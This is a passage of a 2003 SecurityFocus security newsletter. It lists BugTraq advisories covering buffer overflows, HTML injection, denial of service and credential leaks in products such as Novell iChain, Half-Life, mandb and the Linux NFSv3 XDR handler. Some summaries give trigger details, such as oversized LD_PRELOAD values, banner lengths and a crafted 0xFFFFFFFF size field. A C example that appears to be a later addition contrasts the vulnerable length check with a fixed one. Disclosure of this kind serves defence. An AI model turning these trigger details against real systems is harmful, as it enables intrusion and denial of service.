SecurityFocus Newsletter #208
Aug 04 2003 07:56PM
John Boletta (jboletta securityfocus com)
SecurityFocus Newsletter #208
-----------------------------
This Issue is Sponsored by: SPI Dynamics
NEW ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step"
It's as simple as placing additional LDAP query commands
into a Web form input box giving hackers complete access
to all your backend systems! Firewalls and IDS will not
stop such attacks because LDAP Injections are seen as valid
data.
Download this *FREE* white paper from SPI Dynamics for a
complete guide to protection!
http://www.securityfocus.com/SPIDynamics-sf-news5
--------------------------------------------------------------------------
I. FRONT AND CENTER
1. Maintaining System Integrity During Forensics
2. Firewall Evolution - Deep Packet Inspection
3. Betting on Malware
II. BUGTRAQ SUMMARY
1. Multiple Novell iChain Buffer Overflow Vulnerabilities
2. Microsoft Outlook Express Script Execution Weakness
3. e107 Website System HTML Injection Vulnerability
4. ManDB Utility Local Buffer Overflow Vulnerability
5. FreeRadius Chap Remote Buffer Overflow Vulnerability
6. University of Minnesota GopherD Do_Command Buffer Overflow...
7. PBLang Bulletin Board System HTML Injection Vulnerability
8. EFSoftware EF Commander FTP Banner Buffer Overflow Vulnerability
9. PBLang Bulletin Board System IMG Tag HTML Injection Vulnerability
10. Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service...
11. Cisco Aironet Telnet Service User Account Enumeration Weakness
12. Gallery Search Engine Cross-Site Scripting Vulnerability
13. Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
14. MacOS X Third Party Application Screen Effects Password...
15. HP PHNE_27128 Denial Of Service Introduction Vulnerability
16. HP PHNE_26413 Denial Of Service Introduction Vulnerability
17. Softshoe Parse-file Cross-Site Scripting Vulnerability
18. Mini SQL Remote Format String Vulnerability
19. XBlast HOME Environment Variable Buffer Overflow Vulnerability
20. KDE Konqueror HTTP REFERER Authentication Credential Leak...
21. Valve Software Half-Life Client Connection Routine Buffer...
22. Valve Software Half-Life Dedicated Server Malformed Parameter...
23. Valve Software Half-Life Dedicated Server Multiplayer Request...
24. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of...
25. NetScreen ScreenOS TCP Window Size Remote Denial Of Service...
26. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
27. Sun Solaris Runtime Linker LD_PRELOAD Local Buffer Overflow...
28. SGI IRIX NSD AUTH_UNIX GID List Privilege Escalation...
29. Symantec Quarantine Server Disconnect Denial Of Service...
30. XConq Multiple Environment Variable Buffer Overflow...
III. SECURITYFOCUS NEWS ARTICLES
1. Fed: Cyberterror fears missed real threat
2. Panel Probes the Half-life of Bugs
3. UK e-voting pilots deeply flawed
4. Yaha usurps Klez
IV. SECURITYFOCUS TOP 6 TOOLS
1. PeerProtect v0.2
2. DSPAM v2.6.3
3. pkdump v0.96.2
4. Dante v1.1.14
5. System Rescue CD v0.2.0
6. FSlint v2.0.2
V. SECURITYJOBS LIST SUMMARY
1. Systems Security Engineer (Thread)
2. Looking for a Software Developer or Researcher Position (Thread)
3. Technical Operations Manager vacancy (Thread)
4. Two security positions, one in PA and one in DC (Thread)
5. Network Security Engineer relocating to PA (Thread)
6. Security Engineer position - Montgomery, AL (Thread)
7. Question about opportunities for Americans outside the US (Thread)
8. Installation & Support Technician (Thread)
9. Ethical Hacker Needed -- Chicago (Thread)
10. Security Software Sales opportunity- Federal (Thread)
11. Security Software Sales opportunities- Midwest, Southeast/west...
12. Information Security Architect - Franklin Lakes, NJ, USA (Thread)
13. Cisco is looking for a Sr. Microsoft security expert (Thread)
14. Sr. IA Engineer to work on program in Wash., DC (Thread)
15. IA Program Manager (Thread)
16. Full time IT Auditor position in Pittsburgh PA (Thread)
17. Seeking Information Security Position in the Washington, DC...
18. Seattle - Security Sales (Thread)
19. Google: Network Security Engineer (Thread)
20. Fulltime Test positions -Northern Va (Thread)
21. Symantec's MSS practice looking for security device expert...
22. Senior Security Professional seeking post (Thread)
23. Senior Security Analyst Opportunity - Alphatech Corporation...
24. IMMEDIATE OPENING - Vulnerability Assessment, Reston, VA (Thread)
25. IMMEDIATE OPENING - Sr. IDS Manager, Bethesda, MD (Thread)
26. Senior IT Auditor (Thread)
27. System Security Analyst (Thread)
28. IT Security Auditor (Thread)
29. Top Secret Cleared Security Professionals Wanted (Thread)
30. Open Positions at LURHQ Corporation (Thread)
31. Seeking Information Security Position in the SF Bay Area (Thread)
32. Network Security Engineer - Washington, DC (Thread)
33. Alexandria, VA - Sr Mgmt Systems Programmer wanted (Thread)
34. Security Software Developer available (Thread)
VI. INCIDENTS LIST SUMMARY
1. Command Line RPC vulnerability scanner? (Thread)
2. Scan of TCP 552-554 (Thread)
3. RPC DCOM exploit (Thread)
4. Scans for 17300/tcp starting again (Thread)
5. Exploit for Windows RPC may be in the wild! (Thread)
6. new worm? or DDoS attack in progress (Thread)
7. Importance of outbound traffic filtering (Thread)
8. floods through our proxy (Thread)
9. Anyone know this tool? (Thread)
10. email worm? Newsletter, aaa.exe, caraoke ksp.exe (Thread)
11. www.google.com reference in directory-traversal attack (Thread)
12. New or old PHP worm? (Thread)
13. Is this enough to identify this by? (Thread)
14. "access_log?hello" ? (Thread)
15. First time security issue. (Thread)
16. [security-elvandar] "access_log?hello" ? (Thread)
17. Heavy port 1214 traffic revisited (Thread)
18. First Time Security Incident (Thread)
19. email worm? Newsletter, aaa.exe, caraoke ksp.exe (fwd) (Thread)
20. New worm in Japan? (Thread)
21. Port 0 packets (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
1. Analyze binary for holes (Thread)
2. Some help With BOF Exploits Writing. - EAX ?! (Thread)
3. Password Cracking Challenge... (Thread)
4. perl/php connect-back backdoor? (Thread)
5. VL: Remote Linux Kernel < 2.4.21 DoS in XDR routine. (Thread)
6. is it even possible for a worm with dcom vuln? (Thread)
7. Some help With BOF Exploits Writing. (Thread)
8. process on win2K (Thread)
9. Thanks much! (Thread)
10. Unbreakable Lotus Notes (Thread)
VIII. MICROSOFT FOCUS LIST SUMMARY
1. DCOM RPC exploit as a virus/trojan? (Thread)
2. change NT passwords Kerberos (Thread)
3. How to silently deploy DirectX9b? (Thread)
4. Windows XP "write attributes" permission for Users (Thread)
5. IAS as a RADIUS server (Thread)
6. HTASploit (Thread)
7. ISA Server and Win2k3 standard OS (Thread)
8. SecurityFocus Microsoft Newsletter #147 (Thread)
9. monitor folders (Thread)
10. Tracking down a user in a large AD network (Thread)
IX. SUN FOCUS LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
X. LINUX FOCUS LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
XI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Betting on Malware
By George Smith
DARPA's plan to create a futures market for terrorist activities is dead, but the
concept is a natural for predicting viruses and worms.
http://www.securityfocus.com/columnists/176
2. Maintaining System Integrity During Forensics
By Jamie Morris
This article discusses best practices for maintaining system integrity
during forensic examinations.
http://www.securityfocus.com/infocus/1717
3. Firewall Evolution - Deep Packet Inspection
By Ido Dubrawsky
Deep Packet Inspection can be seen as the integration of Intrusion
Detection (IDS) and Intrusion Prevention (IPS) capabilities with
traditional stateful firewall technology.
http://www.securityfocus.com/infocus/1716
II. BUGTRAQ SUMMARY
-------------------
1. Multiple Novell iChain Buffer Overflow Vulnerabilities
BugTraq ID: 8280
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8280
Summary:
Novell iChain Server is a web-based security product designed to implement
and maintain various network-based access controls.
Novell iChain has been reported prone to multiple buffer overflow
vulnerabilities.
The first issue occurs when a special script is run against login. The
issue is likely due to insufficient bounds checking performed on
user-supplied data. It is reported that this issue may be exploited to
trigger a server ABEND condition.
The second issue occurs when a user login name of 230 bytes or more is
passed to the iChain server. It has been reported that if this login fails
and email alerts are enabled in the iChain server, the excessive data will
likely trigger an ABEND condition in the affected software.
It has been reported that both of these conditions may be exploited to
trigger ABEND conditions and deny service to legitimate users.
This BID will be updated as further technical details are disclosed.
2. Microsoft Outlook Express Script Execution Weakness
BugTraq ID: 8281
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8281
Summary:
It has been reported that a weakness may have been re-introduced into
Microsoft Outlook Express. According to the source, the issue described
in Bugtraq ID 3334 had been fixed by Microsoft but appears to have
resurfaced.
The original report (BID 3334) described behavior where script code
included in a message set as type "text/plain" in its content-type header
field would be parsed and executed. A reliable source has indicated that
this condition appears to have returned after being fixed.
This is unsafe behavior as the client should treat all messages of this
type as plain text and not execute any script or render any HTML.
Furthermore, these messages may bypass filters designed to block messages
that contain HTML/script code based on the content-type field.
It should be noted that Symantec has no record of the original issue being
fixed. This record will be updated as more information becomes available.
3. e107 Website System HTML Injection Vulnerability
BugTraq ID: 8279
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8279
Summary:
e107 Website System is a web based content management system implemented
in PHP.
The e107 Website System is prone to an HTML injection vulnerability. This
issue is exposed through the class2.php script. An attacker may exploit
this issue by including hostile HTML and script code in form fields that
support custom tags. This includes areas of the site such as Chatbox and
Forum. This code may be rendered in the web browser of a user who views
these areas of the site. This would occur in the security context of the
site hosting e107.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
4. ManDB Utility Local Buffer Overflow Vulnerability
BugTraq ID: 8278
Remote: No
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8278
Summary:
mandb is a utility that is used to initialize or manually update the index
database caches that are usually maintained by the man utility.
mandb has been reported prone to a local buffer overflow vulnerability.
It has been reported that a local attacker may exploit this issue to
execute arbitrary instructions with elevated privileges. Specifically,
user 'man' privileges.
The issue likely presents itself due to a lack of sufficient bounds
checking performed on user-supplied data. Although unconfirmed, it has
been conjectured that user supplied data copied into an insufficient
reserved memory buffer may overflow the bounds of that buffer and corrupt
saved values that are crucial to program execution flow control.
The attacker may exploit this issue to influence execution flow of the
vulnerable utility and have arbitrary attacker specified instructions
executed inline.
It should be noted that although the mandb utility is installed with
setuid root privileges by default, this issue has been reported to be only
exploitable to attain user 'man' privileges.
Additionally, although this vulnerability has been reported to affect man
version 2.3.19, other versions may also be affected.
5. FreeRadius Chap Remote Buffer Overflow Vulnerability
BugTraq ID: 8282
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8282
Summary:
FreeRADIUS is a freely available, open source implementation of the RADIUS
protocol. It is available for the Unix and Linux operating systems.
A problem with FreeRADIUS has been reported when handling CHAP requests.
Because of this, an attacker may be able to gain unauthorized access to a
system using the vulnerable software.
Specific details about the vulnerability are not currently available. It
is known that the problem in CHAP may be exploited to execute code with
the privileges of the FreeRADIUS server. This could give the attacker
access to the system with the privileges of the FreeRADIUS server.
6. University of Minnesota GopherD Do_Command Buffer Overflow Vulnerability
BugTraq ID: 8283
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8283
Summary:
gopherd is the implementation of the Gopher Protocol Daemon by the
University of Minnesota. It is available for the Unix and Linux platforms.
It has been reported that University of Minnesota gopherd is vulnerable to
a remotely exploitable boundary condition error. This may make it possible
for an attacker to gain unauthorized access to a host using the vulnerable
software.
The problem is in the do_command function of the Gopherd.c file. Due to
insufficient bounds checking on the user-supplied data, it is possible for
an attacker to overwrite sensitive process memory. This could result in
the execution of arbitrary instructions with the privileges of the gopher
daemon process.
7. PBLang Bulletin Board System HTML Injection Vulnerability
BugTraq ID: 8284
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8284
Summary:
PBLang is a bulletin board system implemented in PHP.
PBLang is prone to an HTML injection vulnerability. This issue is exposed
through the docs.php script. An attacker may exploit this issue by
including hostile HTML and script code in posts to the bulletin board.
This is because the script that processes posts does not sufficiently
sanitize user input, allowing attackers to embed HTML and script commands
within the post. This code may be rendered in the web browser of a user
who views these areas of the site. This would occur in the security
context of the site hosting PBLang.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
8. EFSoftware EF Commander FTP Banner Buffer Overflow Vulnerability
BugTraq ID: 8285
Remote: Yes
Date Published: Jul 26 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8285
Summary:
EF Commander is a commercially available FTP client distributed by
EFSoftware. It is available for the Microsoft Windows platform.
A problem with EF Commander could result in the execution of arbitrary
code.
It has been reported that a memory corruption bug exists in EF Commander.
Under some circumstances, when an FTP client connects to a malicious FTP
server it may be possible for the server to exploit a boundary condition
error.
The problem is in the handling of FTP banners in EF Commander. When EF
Commander receives an FTP banner of excessive length, it becomes unstable.
It has been reported that this vulnerability can be reproduced by sending
an FTP banner of 520 or more bytes to a vulnerable client. It is possible
that this vulnerability is an exploitable buffer overflow, and could
result in the execution of attacker-supplied code. Any code executed would
be with the permissions of the EF Commander client user.
9. PBLang Bulletin Board System IMG Tag HTML Injection Vulnerability
BugTraq ID: 8286
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8286
Summary:
PBLang is a bulletin board system implemented in PHP.
PBLang is prone to an HTML injection vulnerability. This issue is exposed
through the docs.php script. An attacker may exploit this issue by
including hostile HTML and script code encapsulated in [IMG] tags of posts
to the bulletin board. This is because the script that processes posts
does not sufficiently sanitize user input, allowing attackers to embed
HTML and script commands within [IMG] tags of the post. This code may be
rendered in the web browser of a user who views these areas of the site.
This would occur in the security context of the site hosting PBLang.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
It should be noted that although this vulnerability has been reported to
affect PBLang version 4.56, previous versions are also likely affected.
10. Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service Vulnerability
BugTraq ID: 8290
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8290
Summary:
The Cisco Aironet AP1x00 is a series of wireless access point devices.
Cisco Aironet AP1x00 series devices are prone to a denial of service
vulnerability upon receipt of a malformed HTTP GET request. This issue
exists in the web administrative interface for affected devices. Such a
request will cause the device to reload. It is possible to cause a
prolonged denial of service by repeatedly sending such requests to an
affected device. This could be exploited to deny availability of a WLAN
that depends on the device.
11. Cisco Aironet Telnet Service User Account Enumeration Weakness
BugTraq ID: 8292
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8292
Summary:
Aironet is the Wireless Access Point solution distributed and maintained
by Cisco.
An information leak has been reported in Cisco Aironet Access Points when
the telnet service has been enabled. This may allow a remote attacker to
gain potentially sensitive information.
The problem is in the response of the telnet daemon. A typical
implementation returns the same response to a failed authentication
attempt regardless of whether the user name is valid. However, when an
invalid username is sent to the Aironet telnet daemon, the daemon responds
with a "% Login invalid" message, allowing the attacker to gather a list of
valid user names on the target device.
12. Gallery Search Engine Cross-Site Scripting Vulnerability
BugTraq ID: 8288
Remote: Yes
Date Published: Jul 27 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8288
Summary:
Gallery is a web-based photo album. It is written in PHP and is available
for Linux and Unix variants as well as Microsoft Windows operating
systems.
Gallery is prone to a cross-site scripting vulnerability. This issue is
present in the search engine (search.php) facility provided by the
software. Input supplied to the search engine via URI parameters is not
sufficiently sanitized of HTML or script code before being echoed back to
users, allowing for cross-site scripting attacks.
An attacker could exploit this issue by constructing a malicious link to
the search engine that contains hostile HTML and script code.
Attacker-supplied code could be rendered in the browser of a user who
follows such a link. This would occur in the security context of the site
hosting the vulnerable software.
13. Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
BugTraq ID: 8287
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8287
Summary:
mod_mylo is a third party module for Apache HTTP server. The module is
designed to log data into a MySQL database in addition to standard
logging.
mod_mylo has been reported prone to a remotely exploitable buffer overflow
vulnerability.
The issue presents itself due to insufficient bounds checking performed on
HTTP requests before the HTTP request string is copied into a buffer in
memory. Data exceeding the size of the buffer will corrupt adjacent
memory. Because memory adjacent to this buffer has been reported to store
a saved instruction pointer, it is possible for a remote attacker to
influence program execution flow. Ultimately a remote attacker may exploit
this condition to execute arbitrary instructions in the context of the
Apache HTTP server.
This issue has been reported to affect mod_mylo version 0.2.1 and all
versions prior.
14. MacOS X Third Party Application Screen Effects Password Protection Bypass
Vulnerability
BugTraq ID: 8293
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8293
Summary:
Apple MacOS X has a screen saver, entitled Screen Effects, with a password
feature.
Screen Effects has been reported prone to a vulnerability where third
party applications may allow a user who has physical access to the host,
to kill the Screen Effects process and thereby subvert desktop password
protection.
Under certain circumstances, this may allow an attacker to gain
unauthorized access to a vulnerable host.
15. HP PHNE_27128 Denial Of Service Introduction Vulnerability
BugTraq ID: 8291
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8291
Summary:
HP PHNE_27128 is a cumulative patch released by HP to address non-critical
issues in nettl and nettladm.
It has been reported that the PHNE_27128 patch has introduced a potential
local denial of service vulnerability. HP has announced that this
vulnerability could be exploited by a non-privileged user to trigger a
system panic on a target system.
This BID will be updated as further technical details regarding this
vulnerability are disclosed.
16. HP PHNE_26413 Denial Of Service Introduction Vulnerability
BugTraq ID: 8289
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8289
Summary:
HP PHNE_26413 is a patch released by HP to address non-critical issues in
nettl, netfmt and nettladm.
It has been reported that the PHNE_26413 patch has introduced a potential
local denial of service vulnerability. HP has announced that this
vulnerability could be exploited by a non-privileged user to trigger a
system panic on a target system.
This BID will be updated as further technical details regarding this
vulnerability are disclosed.
17. Softshoe Parse-file Cross-Site Scripting Vulnerability
BugTraq ID: 8294
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8294
Summary:
Softshoe is a human resources application.
Softshoe is allegedly prone to cross-site scripting attacks. The issue
exists in the 'parse_file' component and may be exploited by including
HTML and script code as input to the 'TEMPLATE' URI parameter. An
attacker can exploit this issue by creating a malicious link that contains
hostile HTML or script code to a site that is hosting the vulnerable
software. If such a link is visited, the attacker-supplied code may be
rendered in the user's web browser. This would occur in the context of
the site hosting the software.
Exploitation of this issue could allow for theft of cookie-based
authentication credentials or other attacks.
18. Mini SQL Remote Format String Vulnerability
BugTraq ID: 8295
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8295
Summary:
Mini SQL (mSQL) is a relational database management system.
mSQL has been reported prone to a remotely exploitable format string
vulnerability.
Reportedly a remote attacker may send malicious format specifiers to
trigger the issue. This issue is due to erroneous use of a formatting
function, which allows format specifiers to be supplied by an external
source, in this case a remote user. By passing specially crafted format
specifiers through a session, an attacker may corrupt process memory and
thereby execute arbitrary code with the privileges of the affected daemon,
which is typically root.
This vulnerability has been reported to affect mSQL version 1.3 and all
prior versions; other versions may also be affected.
19. XBlast HOME Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 8296
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8296
Summary:
XBlast is a multi-player arcade game available for Windows and various
Linux distributions.
A locally exploitable buffer overflow vulnerability has been reported in
XBlast 2.6.1.
XBlast does not perform adequate bounds checking on input supplied via the
HOME environment variable. Successful exploitation can lead to arbitrary
code execution. XBlast is typically installed setgid games on Linux
systems, making it possible to exploit this issue to gain these
privileges.
20. KDE Konqueror HTTP REFERER Authentication Credential Leak Vulnerability
BugTraq ID: 8297
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8297
Summary:
Konqueror is a freely available, open source web browser distributed and
maintained by the KDE project. It is available for the Unix and Linux
operating systems.
It has been reported that a problem in KDE Konqueror may result in the
leak of authentication credentials through the HTTP REFERER header field.
This could result in an attacker gaining unauthorized access to
authentication information.
When a user visits a site that keeps the authentication credentials in the
URL and then follows a link from that page to another site, the browser
passes the full referring URL, credentials included, to the linked site in
the HTTP REFERER header, where it ends up in that site's referrer log. This
could result in unauthorized access to the user account on the referring
page's site.
21. Valve Software Half-Life Client Connection Routine Buffer Overflow Vulnerability
BugTraq ID: 8299
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8299
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life Client has been reported prone to a remotely exploitable buffer
overflow condition.
The issue presents itself in the client connection routine, used by the
client to negotiate a connection to the Half-Life game server. Due to a
lack of sufficient bounds checking performed on both the parameter and
value of data transmitted from the game server to the client, a malicious
server may execute arbitrary code on an affected client.
It has been reported that a parameter of 516 bytes and a value of 268 will
corrupt data adjacent to an undersized buffer. This may allow a remote
attacker to corrupt a saved instruction pointer and thereby influence
program execution flow. Ultimately the attacker may trigger the execution
of supplied instructions in the context of the user running the affected
game client.
It should be noted that although this vulnerability has been reported to
affect Half-Life version 1.1.1.0, previous versions are likely affected.
22. Valve Software Half-Life Dedicated Server Malformed Parameter Loop Denial Of
Service Vulnerability
BugTraq ID: 8301
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8301
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life servers are prone to a denial of service that may be exploited
by a malicious client. By supplying malformed parameters in a client
packet during a request to join a multiplayer game, it may be possible to
cause a loop within the server program. This would result in a crash of
the vulnerable server.
This vulnerability affects the server bundled with Half-Life and the free
Dedicated Server for both Windows and Linux operating systems.
23. Valve Software Half-Life Dedicated Server Multiplayer Request Buffer Overflow
Vulnerability
BugTraq ID: 8300
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8300
Summary:
Half-Life is a game distributed and maintained by Valve Software. It
includes features that allow users to game locally or across a network.
The game engine is used in many modifications.
Half-Life servers are prone to a buffer overflow that may be exploited by
a malicious client. By supplying overly long parameters in a client packet
during a request to join a multiplayer game, it may be possible to corrupt
adjacent locations of stack memory with attacker-supplied data. This could
allow for code execution in the context of the vulnerable server. It
should be noted that the type of data sent may be restricted by the
Half-Life protocol, which may make exploitation more difficult, as certain
characters will not be permitted in the client request.
This vulnerability affects the server bundled with Half-Life and the free
Dedicated Server for both Windows and Linux operating systems.
24. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of Service
Vulnerability
BugTraq ID: 8298
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8298
Summary:
XDR (External Data Representation) is a protocol governing the platform
independent description and encoding of data. In this particular case it
is used in conjunction with the Linux implementation of NFSv3 (Network
File System), which is used to share system-based resources across a
network; NFS uses XDR to describe the format of its data.
Linux Kernel 2.4 XDR handler routines for NFSv3 have been reported prone
to a remote denial of service vulnerability.
The issue presents itself in the decode_fh XDR handler routine contained
in the nfs3xdr.c kernel source file. The issue is due to a signed/unsigned
mismatch, when processing the size field of an XDR packet.
A malicious attacker may bypass the signed sanity check
(if (size > NFS3_FHSIZE)) in the decode_fh XDR handler routine by crafting
an XDR packet whose size field contains the two's complement
representation of -1, 0xFFFFFFFF. Because the comparison is performed on a
signed value, -1 is not greater than NFS3_FHSIZE and the check passes. The
value is then passed to a memcpy() call, which interprets it as the
unsigned value 0xFFFFFFFF (4 GB) for its size parameter; the resulting
massive memcpy operation will trigger a kernel panic.
It has been reported that the target host may need an accessible exported
directory, if this vulnerability is to be successfully exploited. It
should be noted that other methods to trigger the vulnerability might also
be possible.
This vulnerability has been reported to affect the Linux 2.4 kernel tree.
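The signed/unsigned mismatch described above, as an added example that is not the kernel's own nfs3xdr.c code: a constructed XDR length word is run through the length check in its vulnerable (signed int) form and in a hardened unsigned form, so that a reader can see why 0xFFFFFFFF slips past one and not the other. NFS3_FHSIZE is set to 64 here as an assumption, and the packet layout is constructed for illustration; no copy is ever performed, only the decision is returned.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed stand-in for the kernel constant; 64 is used here for illustration. */
#define NFS3_FHSIZE 64

/* Constructed packet layout: a 4-byte big-endian length word, as an XDR
 * opaque length would be encoded, followed (conceptually) by the handle. */
static uint32_t xdr_read_u32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Build the constructed 4-byte length word for a given value. */
void make_fh_packet(unsigned char out[4], uint32_t len)
{
    out[0] = (unsigned char)(len >> 24);
    out[1] = (unsigned char)(len >> 16);
    out[2] = (unsigned char)(len >> 8);
    out[3] = (unsigned char)len;
}

/* Vulnerable shape of the check: the length is held in a signed int, so
 * 0xFFFFFFFF reads as -1, "-1 > NFS3_FHSIZE" is false, and the value is
 * handed on as a size_t, where it becomes SIZE_MAX (4 GB on 32-bit). */
bool decode_fh_vulnerable_check(const unsigned char *pkt, size_t *copy_len)
{
    int size = (int)xdr_read_u32(pkt);   /* -1 for 0xFFFFFFFF on common ABIs */
    if (size > NFS3_FHSIZE)              /* bypassed by any negative value */
        return false;
    *copy_len = (size_t)size;            /* the length memcpy() would receive */
    return true;
}

/* Hardened form: keep the length unsigned, so every value above the limit,
 * 0xFFFFFFFF included, is rejected before anything is copied. */
bool decode_fh_fixed_check(const unsigned char *pkt, size_t *copy_len)
{
    uint32_t size = xdr_read_u32(pkt);
    if (size > NFS3_FHSIZE)
        return false;
    *copy_len = size;
    return true;
}

/* Wrappers that build a packet for a length word and run each check. */
bool vulnerable_accepts(uint32_t len)
{
    unsigned char pkt[4];
    size_t n = 0;
    make_fh_packet(pkt, len);
    return decode_fh_vulnerable_check(pkt, &n);
}

/* Length the vulnerable path would pass to memcpy(), or 0 if rejected. */
size_t vulnerable_copy_len(uint32_t len)
{
    unsigned char pkt[4];
    size_t n = 0;
    make_fh_packet(pkt, len);
    return decode_fh_vulnerable_check(pkt, &n) ? n : 0;
}

bool fixed_accepts(uint32_t len)
{
    unsigned char pkt[4];
    size_t n = 0;
    make_fh_packet(pkt, len);
    return decode_fh_fixed_check(pkt, &n);
}

int main(void)
{
    uint32_t probe[] = { 32u, 65u, 0xFFFFFFFFu };
    for (size_t i = 0; i < sizeof probe / sizeof probe[0]; i++) {
        printf("len 0x%08x: vulnerable accepts=%d (copy %zu bytes), fixed accepts=%d\n",
               probe[i], vulnerable_accepts(probe[i]),
               vulnerable_copy_len(probe[i]), fixed_accepts(probe[i]));
    }
    return 0;
}
```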
25. NetScreen ScreenOS TCP Window Size Remote Denial Of Service Vulnerability
BugTraq ID: 8302
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8302
Summary:
NetScreen is a line of Internet security appliances integrating firewall,
VPN and traffic management features. ScreenOS is the software used to
manage and configure the firewall. NetScreen supports Microsoft Windows
95, 98, ME, NT and 2000 clients.
NetScreen ScreenOS has been reported prone to a vulnerability that may
allow a remote user to trigger a denial of service condition in an
affected appliance.
It has been reported that, by modifying system configuration values that
control the TCP window size and then connecting to the target appliance,
an attacker may trigger a denial of service in the remote appliance.
It has been reported that the issue only affects NetScreen appliances that
are configured to use management services such as HTTP, SSH or Telnet.
This issue only affects some ScreenOS 4.0.1rx and 4.0.3rx releases.
NetScreen IDP, NetScreen Firewall/VPN products running ScreenOS 3.x and
earlier, 4.0.0, and 4.0.2 are not vulnerable. The vendor has supplied
upgrades for affected versions.
26. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
BugTraq ID: 8303
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8303
Summary:
mandb is a utility that is used to initialize or manually update the index
database caches that are usually maintained by the man utility.
mandb has been reported to be affected by multiple buffer overflow
vulnerabilities.
These issues present themselves in the ult_src(), add_to_dirlist(),
test_for_include() functions and in the PATH/MANPATH argument handler of
mandb.
The issues are due to insufficient bounds checking performed on
user-supplied data before it is copied into reserved buffers in memory. A
local attacker may supply excessive data in a manner sufficient to trigger
these issues and in doing so corrupt arbitrary memory. It has been
conjectured that an attacker may ultimately exploit this issue to execute
arbitrary instructions, with elevated privileges.
Code execution would occur in the context of the mandb utility, typically
user 'man'.
This BID will be split up into unique BIDs as these issues are analyzed in
further detail.
27. Sun Solaris Runtime Linker LD_PRELOAD Local Buffer Overflow Vulnerability
BugTraq ID: 8305
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8305
Summary:
The Sun Solaris runtime linker (ld) is a utility used to link shared
objects to executables at runtime. The environment variable LD_PRELOAD
defines a library that is loaded ahead of others when shared libraries are
resolved.
The Sun Solaris ld runtime linker has been reported prone to a buffer
overflow vulnerability. It has been conjectured that the issue is due to
insufficient bounds checking performed in the routines that process the
value of LD_PRELOAD. The affected routine is thought to be called when an
unprivileged user specifies an LD_PRELOAD value while invoking a setuid
binary.
It has been reported that a local attacker may craft an LD_PRELOAD value
consisting of 1200 bytes of data, prepended and appended with a forward
slash, and then invoke a dynamically linked setuid binary to trigger the
condition in the ld linker. Excessive data copied from the LD_PRELOAD value
may corrupt internal memory and ultimately result in the execution of
arbitrary code with elevated privileges.
It should be noted that this problem affects systems with the following
